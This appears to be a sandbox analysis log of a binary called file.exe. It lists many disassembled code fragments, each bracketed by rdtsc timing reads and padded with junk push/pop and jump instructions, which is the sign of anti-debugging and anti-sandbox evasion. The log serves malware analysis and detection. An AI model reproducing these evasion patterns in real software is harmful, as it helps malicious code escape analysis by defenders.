Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C7B68 second address: 6C7B86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7538h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C7B86 second address: 6C7BB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C5h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6E64DC24C6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CE538 second address: 6CE53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CE53E second address: 6CE542 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CE542 second address: 6CE552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6E644F752Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CE552 second address: 6CE557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CCD81 second address: 6CCD85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CCD85 second address: 6CCD89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CCD89 second address: 6CCDA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 je 00007F6E644F752Eh 0x0000000e jg 00007F6E644F7526h 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CCF53 second address: 6CCF57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CCF57 second address: 6CCF6A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F6E644F752Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CD0CC second address: 6CD0D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F6E64DC24B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CD0D6 second address: 6CD0EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7532h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CE222 second address: 6CE237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F6E64DC24BBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D1421 second address: 6D143F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7534h 0x00000007 jc 00007F6E644F7526h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D7554 second address: 6D755E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D755E second address: 6D7562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D9846 second address: 6D984A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D984A second address: 6D985F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F752Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6DAE1C second address: 6DAE22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6DAE22 second address: 6DAE2D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6DAE2D second address: 6DAE33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E12D4 second address: 6E12E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F752Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E12E4 second address: 6E1305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6E64DC24C4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E1305 second address: 6E1309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EDCAE second address: 6EDCB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F2EEF second address: 6F2F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F7538h 0x00000009 jnc 00007F6E644F7526h 0x0000000f popad 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jc 00007F6E644F7526h 0x0000001e push edx 0x0000001f pop edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F2F22 second address: 6F2F26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F2F26 second address: 6F2F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F2F2C second address: 6F2F3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E64DC24BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F2F3D second address: 6F2F52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7531h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F29F2 second address: 6F2A10 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F6E64DC24BCh 0x00000008 pop edx 0x00000009 push ecx 0x0000000a jmp 00007F6E64DC24BBh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F2A10 second address: 6F2A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 je 00007F6E644F7526h 0x0000000f jmp 00007F6E644F7531h 0x00000014 jmp 00007F6E644F7533h 0x00000019 jmp 00007F6E644F7537h 0x0000001e popad 0x0000001f pushad 0x00000020 jc 00007F6E644F7526h 0x00000026 jp 00007F6E644F7526h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8B84 second address: 6F8B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E64DC24BEh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8E67 second address: 6F8E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8E6D second address: 6F8E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8E71 second address: 6F8E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8E75 second address: 6F8E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8E85 second address: 6F8EA0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007F6E644F7526h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d je 00007F6E644F755Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007F6E644F7526h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F901E second address: 6F9033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 js 00007F6E64DC24B6h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F9187 second address: 6F919B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F6E644F7532h 0x0000000c js 00007F6E644F7526h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FC905 second address: 6FC909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FCACD second address: 6FCAD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FCB59 second address: 6FCB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 nop 0x00000007 movzx edx, cx 0x0000000a push 00000004h 0x0000000c jng 00007F6E64DC24B9h 0x00000012 call 00007F6E64DC24B9h 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007F6E64DC24B8h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FCB81 second address: 6FCB87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FCB87 second address: 6FCB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FCB8B second address: 6FCBE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F752Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jno 00007F6E644F7528h 0x00000013 push eax 0x00000014 jmp 00007F6E644F7534h 0x00000019 pop eax 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f jmp 00007F6E644F752Fh 0x00000024 mov eax, dword ptr [eax] 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F6E644F752Bh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FCBE0 second address: 6FCBF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FCBF5 second address: 6FCC0E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6E644F752Ch 0x00000008 jp 00007F6E644F7526h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FCC0E second address: 6FCC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01990 second address: 4A019D5 instructions: 0x00000000 rdtsc 0x00000002 mov bx, BD1Eh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007F6E644F752Fh 0x0000000e xor si, A9CEh 0x00000013 jmp 00007F6E644F7539h 0x00000018 popfd 0x00000019 popad 0x0000001a mov dword ptr [esp], ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push ebx 0x00000021 pop eax 0x00000022 mov dx, 883Ah 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A019D5 second address: 4A019F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E64DC24C7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A019F0 second address: 4A019F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A019F4 second address: 4A01A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call dword ptr [7721188Ch] 0x0000000e mov edi, edi 0x00000010 push ebp 0x00000011 mov ebp, esp 0x00000013 push ecx 0x00000014 mov ecx, dword ptr [7FFE0004h] 0x0000001a mov dword ptr [ebp-04h], ecx 0x0000001d cmp ecx, 01000000h 0x00000023 jc 00007F6E64DF3F95h 0x00000029 mov eax, 7FFE0320h 0x0000002e mov eax, dword ptr [eax] 0x00000030 mul ecx 0x00000032 shrd eax, edx, 00000018h 0x00000036 mov esp, ebp 0x00000038 pop ebp 0x00000039 ret 0x0000003a pushad 0x0000003b jmp 00007F6E64DC24BBh 0x00000040 call 00007F6E64DC24C8h 0x00000045 mov ebx, ecx 0x00000047 pop ecx 0x00000048 popad 0x00000049 pop ecx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d push ecx 0x0000004e pop edi 0x0000004f mov cx, DA11h 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01A35 second address: 4A01A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E644F752Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01A43 second address: 4A01A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01A47 second address: 4A018E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a xor esi, eax 0x0000000c lea eax, dword ptr [ebp-10h] 0x0000000f push eax 0x00000010 call 00007F6E68AEF671h 0x00000015 mov edi, edi 0x00000017 pushad 0x00000018 mov bh, cl 0x0000001a mov ebx, 6D7206EEh 0x0000001f popad 0x00000020 push esp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push edx 0x00000025 pop ecx 0x00000026 mov edx, 0C64079Eh 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A018E0 second address: 4A01901 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01901 second address: 4A01905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01905 second address: 4A01909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01909 second address: 4A0190F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0190F second address: 4A01945 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6E64DC24C2h 0x00000009 and eax, 253FB0C8h 0x0000000f jmp 00007F6E64DC24BBh 0x00000014 popfd 0x00000015 movzx esi, dx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01945 second address: 4A01949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01949 second address: 4A0194D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0194D second address: 4A01953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01953 second address: 4A01959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01959 second address: 4A0195D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0195D second address: 4A01972 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, 5FA6A935h 0x00000011 mov bx, ax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01972 second address: 4A01978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01978 second address: 4A0197C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01785 second address: 4A017BD instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F6E644F7535h 0x00000010 mov ebp, esp 0x00000012 jmp 00007F6E644F752Eh 0x00000017 pop ebp 0x00000018 pushad 0x00000019 mov cl, F8h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A091D second address: 49A0921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0921 second address: 49A0925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0925 second address: 49A092B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49D0711 second address: 49D064F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b mov ax, C1A3h 0x0000000f pushfd 0x00000010 jmp 00007F6E644F7538h 0x00000015 jmp 00007F6E644F7535h 0x0000001a popfd 0x0000001b popad 0x0000001c retn 0008h 0x0000001f push 00401BF4h 0x00000024 push edi 0x00000025 mov dword ptr [0045F81Ch], eax 0x0000002a call esi 0x0000002c mov edi, edi 0x0000002e jmp 00007F6E644F7530h 0x00000033 xchg eax, ebp 0x00000034 pushad 0x00000035 mov al, 77h 0x00000037 push eax 0x00000038 push edx 0x00000039 mov edi, 04A7D05Ch 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B06E8 second address: 49B06F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B06F7 second address: 49B06FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0158C second address: 4A015D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6E64DC24C1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6E64DC24C8h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A015D8 second address: 4A015DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A015DC second address: 4A015E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A015E2 second address: 49A091D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov esi, 3178BCF7h 0x00000011 pushfd 0x00000012 jmp 00007F6E644F752Ch 0x00000017 jmp 00007F6E644F7535h 0x0000001c popfd 0x0000001d popad 0x0000001e pop ebp 0x0000001f jmp 00007F6E644F752Eh 0x00000024 jmp dword ptr [7721155Ch] 0x0000002a mov edi, edi 0x0000002c push ebp 0x0000002d mov ebp, esp 0x0000002f mov ecx, dword ptr fs:[00000018h] 0x00000036 mov eax, dword ptr [ebp+08h] 0x00000039 mov dword ptr [ecx+34h], 00000000h 0x00000040 cmp eax, 40h 0x00000043 jnc 00007F6E644F752Dh 0x00000045 mov eax, dword ptr [ecx+eax*4+00000E10h] 0x0000004c pop ebp 0x0000004d retn 0004h 0x00000050 test eax, eax 0x00000052 je 00007F6E644F7543h 0x00000054 mov eax, dword ptr [00459710h] 0x00000059 cmp eax, FFFFFFFFh 0x0000005c je 00007F6E644F7539h 0x0000005e mov esi, 00401BB4h 0x00000063 push esi 0x00000064 call 00007F6E68A8ECAAh 0x00000069 mov edi, edi 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990730 second address: 499073F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 499073F second address: 4990758 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 0640199Ah 0x00000008 mov edi, 52F63566h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 mov di, 7EECh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990758 second address: 49907CB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6E64DC24C5h 0x00000008 and ah, FFFFFFC6h 0x0000000b jmp 00007F6E64DC24C1h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov esi, 52B07777h 0x00000018 popad 0x00000019 mov ecx, dword ptr [ebp+08h] 0x0000001c pushad 0x0000001d mov eax, 08A8DE6Fh 0x00000022 call 00007F6E64DC24C4h 0x00000027 mov edi, esi 0x00000029 pop eax 0x0000002a popad 0x0000002b mov eax, 00000000h 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F6E64DC24C4h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49907CB second address: 49907D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49907D1 second address: 4990801 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6E64DC24BCh 0x00000008 movzx eax, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e inc eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6E64DC24C8h 0x00000016 rdtsc
